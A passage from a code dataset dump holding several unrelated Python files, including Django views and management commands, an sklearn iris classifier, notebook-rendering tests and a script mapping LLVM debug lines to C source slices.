read_excel\nfrom json import load, dump\nfrom codecs import open\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **options):\n i = 1\n for organisation in Organisation.objects.filter(name__icontains=\"unknown\"):\n for rel in RelationConcertOrganisation.objects.filter(organisation=organisation):\n concert = rel.concert\n for ca in concert.concertannouncements():\n if \"songkick\" in ca.gigfinder.name and ca.is_festival:\n raw_venue = ca.raw_venue\n venue_organisation = raw_venue.organisation\n if venue_organisation and \"unknown\" not in venue_organisation.name.lower():\n line = [str(i), \"concert\", str(concert), str(concert.pk), \"with organisation\", str(organisation), str(organisation.pk), \"has ca\", str(ca), str(ca.pk), \"with raw venue\", str(raw_venue), str(raw_venue.pk), \"which has organisation\", str(venue_organisation), str(venue_organisation.pk) if venue_organisation else str(None)]\n print(\"\\t\".join(line))\n i += 1\n rel.organisation = venue_organisation\n rel.save()\n","sub_path":"hlwtadmin/management/commands/resolve_unknown_venues_for_known_venues.py","file_name":"resolve_unknown_venues_for_known_venues.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"607178521","text":"def ehPrimo(k):\n\ti = 0\n\tx = 0\n\twhile i <= k:\n\t\ti += 1\n\t\tif (k % i) == 0:\n\t\t\tx += 1\n\tif x == 2:\n\t\treturn k\n\t\ndef maior_primo(num):\n\ti = 0\n\twhile i <= 2:\n\t\tif ehPrimo(num) == num:\n\t\t\treturn num\n\t\telse:\n\t\t\tnum -= 1\n\n\nn = int(input(\"Digite um número inteiro: \"))\nprint(maior_primo(n))","sub_path":"week_05_ex_02.py","file_name":"week_05_ex_02.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108742816","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 5 13:11:18 2017\n\n@author: giova\n\"\"\"\n\n\"\"\"\nCreated on Sun Jul 2 10:11:08 2017\n\n@author: giova\n\"\"\"\n\n# Import libraries\nimport numpy as np\nimport pandas as pd\nfrom time import time\nfrom sklearn.metrics import f1_score\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn import datasets\n\n# Read student data\niris = datasets.load_iris()\nprint(\"Student data read successfully!\")\nX=iris.data[:,[2,3]]\ny=iris.target\n\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.3, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nsc.fit(X_train)\nX_train_std = sc.transform(X_train)\nX_test_std = sc.transform(X_test)\n\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\n markers=('s','x','o','^','v')\n colors=('red','blue','lightgreen','gray','cyan')\n cmap=ListedColormap(colors[:len(np.unique(y))])\n \n x1_min, x1_max=X[:,0].min() -1, X[:,0].max()+1\n x2_min, x2_max=X[:,1].min() -1, X[:,1].max()+1\n \n xx1,xx2 =np.meshgrid(np.arange(x1_min,x1_max,resolution),np.arange(x2_min,x2_max,resolution))\n \n z=classifier.predict(np.array([xx1.ravel(),xx2.ravel()]).T)\n z=z.reshape(xx1.shape)\n plt.contourf(xx1,xx2,z,alpha=0.4,cmap=cmap)\n plt.xlim(xx1.min(),xx1.max())\n plt.ylim(xx2.min(),xx2.max())\n \n \n \n\nfrom sklearn.tree import DecisionTreeClassifier\ntree = DecisionTreeClassifier(max_depth=3, random_state = 0)\ntree.fit(X_train, y_train)\nX_combined = np.vstack((X_train, X_test))\ny_combined = np.hstack((y_train, y_test))\nplot_decision_regions(X_combined, y_combined, classifier=tree, test_idx=range(105,150))\nplt.xlabel('petal length')\nplt.ylabel('petal width')\nplt.legend(loc='upper left')\nplt.show()\n\n\n'''\n# Print the results\nprint(\"Total number of students: {}\".format(n_students))\nprint(\"Number of features: {}\".format(n_features))\nprint(\"Number of students who passed: {}\".format(n_passed))\nprint(\"Number of students who failed: {}\".format(n_failed))\nprint(\"Graduation rate of the class: {:.2f}%\".format(grad_rate))\n'''\n\n\n\n'''\n# Show the list of columns\nprint(\"Feature columns:\\n{}\".format(feature_cols))\nprint(\"\\nTarget column: {}\".format(target_col))\n'''\n\n# Separate the data into feature data and target data (X_all and y_all, respectively)\n\n\n\n'''\n# Show the feature information by printing the first five rows\nprint(\"\\nFeature values:\")\nprint(X_all.head())'''\n\n\n'''View data correlation'''\n'''import matplotlib.pyplot as plt\nplt.figure()\n\ncolors=['pink' if i=='yes' else 'skyblue' for i in y_all]\nmarkers=['D' if i=='yes' else 'o' for i in y_all]\nfor x,y, c, m in zip(X_all['age'], X_all['Medu'], colors, markers):\n plt.scatter(x,y,alpha=0.8, c=c, marker=m)\nplt.title(\"yohoo\")\nplt.xlabel(\"yooohoo\")\nplt.ylabel('prices')\nplt.show()'''\n\n# TODO: Import 'GridSearchCV' and 'make_scorer'\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import make_scorer\nfrom sklearn.model_selection import KFold\n\n'''k-fold creation'''\nn_splits = 4\nkf = KFold(n_splits = n_splits, shuffle=True, random_state=42)\n\n'''scorer creation'''\nf1_scorer = make_scorer(f1_score, pos_label='yes')\n\ndef train_classifier(clf, X_train, y_train):\n \n start = time()\n clf.fit(X_train,y_train)\n end= time()\n \n print(\"Trained in {:.4f} seconds\".format(end-start))\n\ndef predict_labels(clf, features, target):\n y_pred=clf.predict(features)\n return f1_score(target.values, y_pred,pos_label='yes')\n\n''' select model '''\nfrom sklearn.tree import DecisionTreeClassifier\nclf_A = DecisionTreeClassifier(random_state=41)","sub_path":"irs_dataset.py","file_name":"irs_dataset.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536814148","text":"from django.http import JsonResponse, HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom bgapp.bgModels import *\nfrom django.core import exceptions\nfrom .view_utils import *\nfrom django.shortcuts import render\nfrom .stats import get_topics_Latency, get_user_topics_Latency\n\nimport logging\nlog = logging.getLogger('batground')\n\n@csrf_exempt\n@get_topics_Latency.time()\ndef get_topics(request):\n req = json.loads(request.body.decode('utf-8'))\n try:\n user_db = User.objects.get(userID__exact=req['user_id'])\n except exceptions.ObjectDoesNotExist:\n return JsonResponse({'topics': []})\n\n if not req['input']:\n topic_suggestions = get_popular_topics()\n else:\n topic_suggestions = get_topic_suggestions(req['input'].strip())[:options_per_page]\n\n json_content = {\n 'topics': [], # [ ['topic', pro, con], ... ]\n }\n\n for topic in topic_suggestions:\n json_content['topics'].append(\n [topic.content,\n topic.camp(True).users\n .exclude(userID=user_db.userID)\n .exclude(isOnline=False)\n .count(),\n topic.camp(False).users\n .exclude(userID=user_db.userID)\n .exclude(isOnline=False)\n .count()\n ]\n )\n\n response = JsonResponse(json_content)\n return response\n\n\n@csrf_exempt\n@get_user_topics_Latency.time()\ndef get_user_topics(request):\n req = json.loads(request.body.decode('utf-8'))\n try:\n user_db = User.objects.get(userID__exact=req['user_id'])\n except exceptions.ObjectDoesNotExist:\n return JsonResponse({'topics': []})\n\n user_opinions = user_db.opinions.filter(isDeleted=False)\n json_content = {\n 'topics': [] # [ [topics, position], ... ]\n }\n for opinion in user_opinions:\n json_content['topics'].append(\n [opinion.topic.content, opinion.position]\n )\n\n response = JsonResponse(json_content)\n return response\n\n@csrf_exempt\ndef itsme(request):\n return HttpResponse('Hi, long duong')\n","sub_path":"bgapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"464788658","text":"from django.contrib.auth import authenticate, login\nfrom django.http import HttpResponse\nfrom WebAttendance.login.models import LoginForm\nfrom WebAttendance.InputHandler.models import transaction_record\nfrom django.shortcuts import render_to_response\nfrom models import SearchForm\nfrom django.core.exceptions import ObjectDoesNotExist\n\ndef login_view(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n username= form.cleaned_data['username']\n password= form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n search_form= SearchForm()\n return render_to_response('userpage.html',{'username': username,\n 'search_form': search_form})\n else:\n return HttpResponse(\"Bye, world.\")\n else:\n return HttpResponse(\"TotalFail\")\n if request.method == 'GET':\n form= SearchForm(request.GET)\n trans_id= form.data['id']\n try:\n b=get_data(trans_id)\n gateway_id=b.gateway_id\n trans_num=b.trans_num\n time_stamp=b.time_stamp\n vids=b.valid_ids\n ivids=b.invalid_ids\n vids=vids.split(\",\")\n ivids= ivids.split(\",\")\n except ObjectDoesNotExist:\n vids=[]\n ivids=[]\n gateway_id= \"N/A\"\n trans_num=\"DOES NOT EXIST\"\n time_stamp=\"\"\n \n \n\n search_form= SearchForm()\n return render_to_response('results.html',{'username': \"ted\",\n 'search_form': search_form,\n 'gateway_num':gateway_id,\n 'trans_num':trans_num,\n 'time_stamp':time_stamp,\n 'vids':vids, \n 'ivids': ivids}) \n \n\n \ndef get_data( trans_num):\n b=transaction_record.objects. get(trans_num=trans_num)\n return b\n\ndef create_token_response(model):\n tokens= str(model).split()\n return tokens\n \n","sub_path":"WebAttendance/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"389073159","text":"from __future__ import division\n\n__copyright__ = \"Copyright (C) 2017 Dong Zhuang\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nimport json\nfrom django.test import TestCase\nfrom tests.base_test_mixins import (\n improperly_configured_cache_patch, SingleCoursePageTestMixin)\nfrom tests.test_sandbox import SingleCoursePageSandboxTestBaseMixin\nfrom tests.utils import mock\n\n\nclass SingleCoursePageCacheTest(SingleCoursePageTestMixin, TestCase):\n\n @classmethod\n def setUpTestData(cls): # noqa\n super(SingleCoursePageCacheTest, cls).setUpTestData()\n cls.c.force_login(cls.student_participation.user)\n cls.start_flow(cls.flow_id)\n\n @improperly_configured_cache_patch()\n def test_disable_cache(self, mock_cache):\n from django.core.exceptions import ImproperlyConfigured\n with self.assertRaises(ImproperlyConfigured):\n from django.core.cache import cache # noqa\n\n def test_view_flow_with_cache(self):\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n self.c.get(self.get_page_url_by_ordinal(1))\n\n with mock.patch(\"course.content.get_repo_blob\") as mock_get_repo_blob:\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(mock_get_repo_blob.call_count, 0)\n\n def test_view_flow_with_cache_improperly_configured(self):\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n self.c.get(self.get_page_url_by_ordinal(1))\n\n with improperly_configured_cache_patch():\n resp = self.c.get(self.get_page_url_by_ordinal(0))\n self.assertEqual(resp.status_code, 200)\n\n\n# {{{ Test Nbconvert for rendering ipynb notebook\n\nQUESTION_MARKUP_FULL = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\") }}\n\"\"\"\n\nQUESTION_MARKUP_SLICED1 = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", indices=[0, 1, 2]) }}\n\"\"\"\n\nQUESTION_MARKUP_SLICED2 = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", indices=[1, 2]) }}\n\"\"\"\n\nQUESTION_MARKUP_CLEAR_MARKDOWN = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", clear_markdown=True) }}\n\"\"\"\n\nQUESTION_MARKUP_CLEAR_OUTPUT = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", clear_output=True) }}\n\"\"\"\n\nQUESTION_MARKUP_CLEAR_ALL = \"\"\"\ntype: Page\nid: ipynb\ncontent: |\n\n # Ipython notebook Examples\n\n {{ render_notebook_cells(\"test.ipynb\", clear_markdown=True, clear_output=True) }}\n\"\"\"\n\nMARKDOWN_PLACEHOLDER = \"wzxhzdk\"\n\nTEST_IPYNB_BYTES = json.dumps({\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# First Title of Test NoteBook\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": 1,\n \"metadata\": {\n \"scrolled\": True\n },\n \"outputs\": [\n {\n \"name\": \"stdout\",\n \"output_type\": \"stream\",\n \"text\": [\n \"This is function1\\n\"\n ]\n }\n ],\n \"source\": [\n \"def function1():\\n\",\n \" print(\\\"This is function1\\\")\\n\",\n \"\\n\",\n \"function1()\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# Second Title of Test NoteBook\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": 2,\n \"metadata\": {\n \"collapsed\": True\n },\n \"outputs\": [],\n \"source\": [\n \"def function2():\\n\",\n \" print(\\\"This is function2\\\")\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": 3,\n \"metadata\": {},\n \"outputs\": [\n {\n \"name\": \"stdout\",\n \"output_type\": \"stream\",\n \"text\": [\n \"This is function2\\n\"\n ]\n }\n ],\n \"source\": [\n \"function2()\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": None,\n \"metadata\": {\n \"collapsed\": True\n },\n \"outputs\": [],\n \"source\": [\n \"print(`5**18`)\"\n ]\n }\n ],\n \"metadata\": {\n \"kernelspec\": {\n \"display_name\": \"Python 3\",\n \"language\": \"python\",\n \"name\": \"python3\"\n },\n \"language_info\": {\n \"codemirror_mode\": {\n \"name\": \"ipython\",\n \"version\": 3\n },\n \"file_extension\": \".py\",\n \"mimetype\": \"text/x-python\",\n \"name\": \"python\",\n \"nbconvert_exporter\": \"python\",\n \"pygments_lexer\": \"ipython3\",\n \"version\": \"3.5.0\"\n }\n },\n \"nbformat\": 4,\n \"nbformat_minor\": 2\n}).encode()\n\nFIRST_TITLE_TEXT = \"First Title of Test NoteBook\"\nSECOND_TITLE_TEXT = \"Second Title of Test NoteBook\"\nTEXT_CELL_HTML_CLASS = \"text_cell_render\"\nCODE_CELL_HTML_CLASS = \"code_cell\"\nCODE_CELL_IN_STR_PATTERN = '
    In[%s]:
    '\nCODE_CELL_PRINT_STR1 = \"This is function1\"\nCODE_CELL_PRINT_STR2 = \"This is function2\"\nRELATE_IPYNB_CONVERT_PRE_WRAPPER_TAG_NAME = \"relate_ipynb\"\n\n\ndef strip_nbsp(s):\n \"\"\"\n Returns the given HTML with ' ' (introduced by nbconvert) stripped\n \"\"\"\n from django.utils.encoding import force_text\n return force_text(s).replace(' ', '').replace(u'\\xa0', '')\n\n\ndef get_nb_html_from_response(response):\n from django.utils.safestring import mark_safe\n return strip_nbsp(mark_safe(response.context[\"body\"]))\n\n\nclass NbconvertRenderTestMixin(SingleCoursePageSandboxTestBaseMixin):\n def assertIsValidNbConversion(self, response): # noqa\n self.assertNotContains(response, MARKDOWN_PLACEHOLDER)\n self.assertNotContains(response, \"```\")\n self.assertNotContains(response, \"# First Title of Test NoteBook\")\n self.assertNotContains(response, \"# Second Title of Test NoteBook\")\n self.assertNotContains(response, RELATE_IPYNB_CONVERT_PRE_WRAPPER_TAG_NAME)\n\n def setUp(self):\n super(NbconvertRenderTestMixin, self).setUp()\n patcher = mock.patch(\"course.content.get_repo_blob_data_cached\")\n self.mock_func = patcher.start()\n self.mock_func.return_value = TEST_IPYNB_BYTES\n self.addCleanup(patcher.stop)\n\n\nclass NbconvertRenderTest(NbconvertRenderTestMixin, TestCase):\n\n @classmethod\n def setUpTestData(cls): # noqa\n super(NbconvertRenderTest, cls).setUpTestData()\n cls.c.force_login(cls.instructor_participation.user)\n\n def test_full_notebook_render(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_FULL)\n\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=2)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertContains(resp, FIRST_TITLE_TEXT, count=1)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=2)\n self.assertContains(resp, CODE_CELL_PRINT_STR2, count=2)\n\n # backtick is properly rendered with highlight\n # for \"`5**18`\". though this syntax is not allowed in PY3\n self.assertContains(\n resp,\n '`5')\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html)\n\n def test_notebook_sliced1(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_SLICED1)\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=2)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=1)\n self.assertContains(resp, FIRST_TITLE_TEXT, count=1)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=2)\n self.assertNotContains(resp, CODE_CELL_PRINT_STR2)\n\n nb_html = get_nb_html_from_response(resp)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 1, nb_html, count=1)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 2, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 3, nb_html, count=0)\n\n def test_notebook_sliced2(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_SLICED2)\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=1)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=1)\n self.assertNotContains(resp, FIRST_TITLE_TEXT)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=2)\n self.assertNotContains(resp, CODE_CELL_PRINT_STR2)\n\n # code highlight functions (in terms of rendered ipynb notebook cells only)\n import six\n if six.PY3:\n self.assertRegex(resp.context[\"body\"], 'class=\"\\w*\\s*highlight[^\\w]')\n self.assertContains(resp, \" highlight hl-ipython3\")\n self.assertContains(resp,\n 'print'\n '(',\n count=1)\n\n nb_html = get_nb_html_from_response(resp)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 1, nb_html, count=1)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 2, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 3, nb_html, count=0)\n\n def test_notebook_clear_markdown(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_CLEAR_MARKDOWN)\n self.assertIsValidNbConversion(resp)\n self.assertNotContains(resp, TEXT_CELL_HTML_CLASS)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertNotContains(resp, FIRST_TITLE_TEXT)\n self.assertNotContains(resp, SECOND_TITLE_TEXT)\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html, count=1)\n\n def test_notebook_clear_output(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_CLEAR_OUTPUT)\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=2)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertContains(resp, FIRST_TITLE_TEXT, count=1)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR2, count=1)\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % \"\", nb_html, count=4)\n\n def test_notebook_clear_markdown_and_output(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_CLEAR_ALL)\n self.assertIsValidNbConversion(resp)\n self.assertNotContains(resp, TEXT_CELL_HTML_CLASS)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertNotContains(resp, FIRST_TITLE_TEXT)\n self.assertNotContains(resp, SECOND_TITLE_TEXT)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR2, count=1)\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % \"\", nb_html, count=4)\n\n\n# }}}\n\n\nTEST_SANDBOX_MARK_DOWN_PATTERN = r\"\"\"\ntype: Page\nid: test_endraw\ncontent: |\n # Title\n {%% raw %%}\\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}{%% endraw %%}\n [example1](http://example1.com)\n {%% raw %%}\n value=${#1}\n %s\n [example2](http://example2.com)\n\"\"\" # noqa\n\n\nclass YamlJinjaExpansionTest(SingleCoursePageSandboxTestBaseMixin, TestCase):\n\n # {{{ test https://github.com/inducer/relate/pull/376 which\n # fixed https://github.com/inducer/relate/issues/373\n\n def test_embedded_raw_block1(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{% endraw %}\"\n expected_literal = (\n r'

    \\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n '\\n'\n 'example1

    \\n'\n '

    value=${#1}

    \\n'\n '

    example2

    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%endraw%}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{% endraw %}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n def test_embedded_raw_block2(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%- endraw %}\"\n\n expected_literal = (\n r'

    \\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n '\\n'\n 'example1

    \\n'\n '

    value=${#1}\\n'\n 'example2

    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%-endraw%}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n def test_embedded_raw_block3(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%- endraw -%}\"\n expected_literal = (\n r'

    \\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n '\\n'\n 'example1

    \\n'\n '

    value=${#1}example2

    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%-endraw-%}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n def test_embedded_raw_block4(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{% endraw -%}\"\n expected_literal = (\n r'

    \\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n '\\n'\n 'example1

    \\n'\n '

    value=${#1}\\n'\n 'example2

    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n # }}}\n\n# vim: fdm=marker\n","sub_path":"tests/test_content.py","file_name":"test_content.py","file_ext":"py","file_size_in_byte":17203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"124266205","text":"\nfrom pprint import pprint\nimport pdb\n\nfrom lib import helper\n\nclass Query:\n \n def __init__(self, val):\n \n val_words = val.split(' ')\n popped = []\n \n while len(val_words) > 0:\n search = ' '.join(val_words)\n title0 = helper.titles_of_search_query(search)[0]\n if title0.lower() == search.lower():\n self.subject = title0\n self.subquery = popped\n return\n else:\n popped.insert(0, val_words.pop())\n \n","sub_path":"lib/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427441193","text":"#coding:utf-8\nimport sys\nimport os\nimport re\nimport pickle\n\ndef getSourceSlicer(finalf,linelist):\n slicerfile = finalf.replace('.final.ll','.slicer.c')\n tmpdir = finalf[0:finalf.rfind('/')]\n lastdir = tmpdir[0:tmpdir.rfind('/')]\n files = os.listdir(lastdir)\n sourcefile = ''\n for mfile in files:\n if mfile.endswith('.c') and finalf.find(mfile[:-2]) != -1:\n sourcefile = lastdir+'/'+mfile\n linecount = 0\n linedict = {}\n mdictpkl[slicerfile] = []\n funcandfocus[slicerfile] = []\n funcandfocus[slicerfile].append(0)\n funcnamelist = re.findall('#(.+)#',finalf)\n linenumlist = re.findall('_(\\d+):',finalf)\n funcname = ''\n if(len(funcnamelist)):\n funcname = funcnamelist[0]\n linenum = 0\n if(len(linenumlist)):\n linenum = (int)(linenumlist[0])\n with open(sourcefile) as rf:\n for line in rf:\n linecount += 1\n if linecount in linelist:\n linedict[linecount] = line\n linec2 = 0\n with open(slicerfile,'w') as sf:\n for item in linelist:\n linec2 += 1\n if item == '{' or item == '}':\n sf.write(item+'\\n')\n else:\n if item in linedict.keys():\n linetow = linedict[item]\n if linetow.find('/*#MFLAWTAG*/') != -1:\n mdictpkl[slicerfile].append(linec2)\n if linetow.find(funcname) != -1:\n funcandfocus[slicerfile][0] = linec2\n if item == linenum:\n funcandfocus[slicerfile].append(linec2)\n sf.write(linetow.replace('/*#MFLAWTAG*/',''))\n if(len(funcandfocus[slicerfile]) == 1):\n funcandfocus[slicerfile].append(funcandfocus[slicerfile][0]+1)\n \n\n\n\n\n\ndef processdbg(finalfile):\n mlist = []\n regex1 = re.compile('.+!dbg !(\\d+)')\n with open(finalfile,'r') as dbgf:\n for line in dbgf:\n num = regex1.findall(line)\n if len(num) > 0:\n mlist.append(num[0])\n if line.find('{') != -1:\n mlist.append('{')\n if line.find('}') != -1:\n mlist.append('}')\n debugfile = finalfile.replace('.final.ll','.new.ll') \n if not os.path.exists(debugfile):\n return\n comparedict = {}\n regex2 = re.compile('^!(\\d+).+line:.(\\d+),')\n with open(debugfile,'r') as debugf:\n for line in debugf:\n numdict = regex2.findall(line)\n if len(numdict) < 1:\n continue\n comparedict[numdict[0][0]] = numdict[0][1]\n linelist = []\n sourcefunclist = []\n for item in mlist:\n if item == '{' or item == '}':\n linelist.append(item)\n elif item in comparedict.keys():\n tmpline = int(comparedict[item])\n if linelist and tmpline in linelist:\n continue\n linelist.append(tmpline)\n\n linenumpkl = finalfile.replace('.final.ll','.souline.pkl')\n pickle.dump(linelist,open(linenumpkl,'w'))\n getSourceSlicer(finalfile,linelist)\n\n\n\n\ndef getfinal(mpath):\n sondirs = os.listdir(mpath)\n for mdir in sondirs:\n npath = os.path.join(mpath,mdir)\n if os.path.isdir(npath):\n getfinal(npath)\n else:\n if npath.endswith('.final.ll'):\n processdbg(npath)\n\nif __name__ == '__main__':\n slicerpath = sys.argv[1]\n mdictpkl = {}\n funcandfocus = {}\n getfinal(slicerpath)\n pickle.dump(mdictpkl,open('sourcedict.pkl','w'))\n pickle.dump(funcandfocus,open('funcandfocusLoc.pkl','w'))\n","sub_path":"src/NVD/tools/getsourceslice/getSourceLine.py","file_name":"getSourceLine.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} 